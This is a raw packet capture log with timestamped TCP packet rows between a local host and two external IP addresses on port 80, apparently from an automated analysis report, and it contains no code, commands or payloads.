Oct 29, 2021 20:50:55.911848068 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.911859035 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.911885977 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.911890030 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.911909103 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.911935091 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.911959887 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.911978006 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.912014961 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.912137985 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.912163019 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.912185907 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.912187099 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.912204027 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.912226915 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.912436008 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.912461996 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.912487984 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.912492990 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.912512064 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.912533045 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.912535906 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.912559032 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.912575006 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.912579060 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.912617922 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.912655115 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.912681103 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.912704945 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.912722111 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.912756920 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.912777901 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.912796021 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.912802935 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.912827969 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.912894011 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.912956953 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.913011074 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.913084984 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.913109064 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.913127899 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.913144112 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.913192034 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.913217068 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.913242102 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.913258076 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.913368940 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.913392067 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.913399935 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.913408041 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.913410902 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.913440943 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.936618090 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.936748981 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:51:01.203417063 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:01.236718893 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.419167995 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.419189930 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.419203043 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.419214964 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.419337034 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:02.419403076 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:02.475095987 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.475126028 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.475146055 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.475163937 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.475231886 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:02.475269079 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:02.502434969 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.502460957 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.502474070 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.502490997 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.502507925 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.502522945 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.502645969 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:02.502707958 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:02.522289038 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.522319078 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.522347927 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.522367954 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.522396088 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.522412062 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.522428036 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.522445917 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.522474051 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:02.522564888 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:02.535501003 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.535520077 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.535657883 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:02.535983086 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.536001921 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.536017895 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.536029100 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.536114931 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:02.538990021 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.539016008 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.539109945 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.539123058 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.539144993 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:02.539169073 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:02.569044113 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.569072008 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.569089890 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.569106102 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.569122076 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.569138050 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.569225073 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:02.569288015 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:02.569681883 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.571743965 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.571764946 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.571784019 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.571794987 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.571837902 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:02.571878910 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:02.615931034 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.615952969 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.615964890 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.615972996 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.616080046 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:02.711112022 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.711138964 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.711157084 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.711169004 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.711324930 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:02.715147018 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.715171099 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.715187073 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.715202093 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.715219021 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.715234995 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.715250969 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.715266943 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.715281963 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.715297937 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.715313911 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.715321064 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:02.715328932 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.715347052 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.715395927 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:02.715418100 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:02.743530035 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.743597031 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.743637085 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.743670940 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.743758917 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:02.749748945 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.749773979 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.749785900 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.749794006 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.749926090 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:02.785836935 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.785866022 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.785877943 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.785895109 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.785912037 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.785928011 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.785940886 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.786000013 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:02.786050081 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:02.819175959 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.819205999 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.819224119 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.819236040 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.819370985 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:02.819864035 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.819884062 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.819900036 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.819911957 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.819927931 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:02.819962978 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:02.851248026 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.851274967 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.851290941 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.851303101 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.851463079 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:02.853281975 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.853308916 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.853327990 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.853342056 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.853442907 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:02.853483915 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:02.883704901 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.883728981 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.883747101 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.883759022 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.883871078 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:02.886074066 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.886096001 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.886111975 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.886126041 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.886217117 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:02.886275053 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:02.918221951 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.918265104 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.918292999 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.918308020 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.918323040 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.918351889 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.918363094 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:02.918369055 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.918385983 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.918406963 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:02.918452978 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.918477058 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.918481112 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:02.918508053 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:02.952683926 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.952713966 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.952730894 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.952745914 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.952768087 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.952789068 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.952804089 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.952856064 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:02.952867031 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.952884912 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.952898979 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:02.952935934 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:02.952975035 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:02.996315002 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.003807068 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.003832102 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.003844023 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.003855944 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.003873110 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.003889084 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.003904104 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.003920078 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.003936052 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.003948927 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.004002094 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.004077911 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.036596060 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.036624908 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.036643028 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.036659956 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.036680937 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.036700010 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.036716938 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.036734104 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.036750078 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.036763906 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.036778927 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.036876917 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.068911076 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.068933964 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.068947077 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.068954945 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.069104910 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.069196939 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.069214106 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.069231033 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.069242954 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.069283009 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.069297075 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.069385052 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.069401979 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.069426060 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.069540024 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.069581985 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.108956099 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.108993053 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.109013081 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.109025955 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.109041929 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.109059095 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.109074116 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.109086037 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.109102011 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.109117985 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.109136105 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.109131098 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.109147072 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.109221935 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.109246969 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.143913984 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.143950939 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.143966913 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.143984079 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.144062042 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.144114017 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.144361973 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.144403934 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.144421101 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.144437075 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.144450903 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.144491911 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.144493103 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.144541979 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.144581079 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.177186012 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.177212000 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.177226067 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.177234888 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.177337885 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.177378893 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.177706957 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.177728891 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.177786112 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.177794933 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.177809954 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.177851915 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.177947998 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.177968979 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.178008080 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.178035975 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.178054094 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.178092003 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.178143024 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.178164005 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.178177118 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.178200960 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.243328094 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.243354082 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.243372917 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.243432999 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.243454933 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.243472099 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.243484974 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.243508101 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.243594885 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.243602991 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.243627071 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.243643045 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.243654966 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.243680000 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.243705034 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:03.275996923 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.276030064 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.276051998 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.276068926 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:03.276084900 CEST	80	49865	91.219.236.97	192.168.2.4
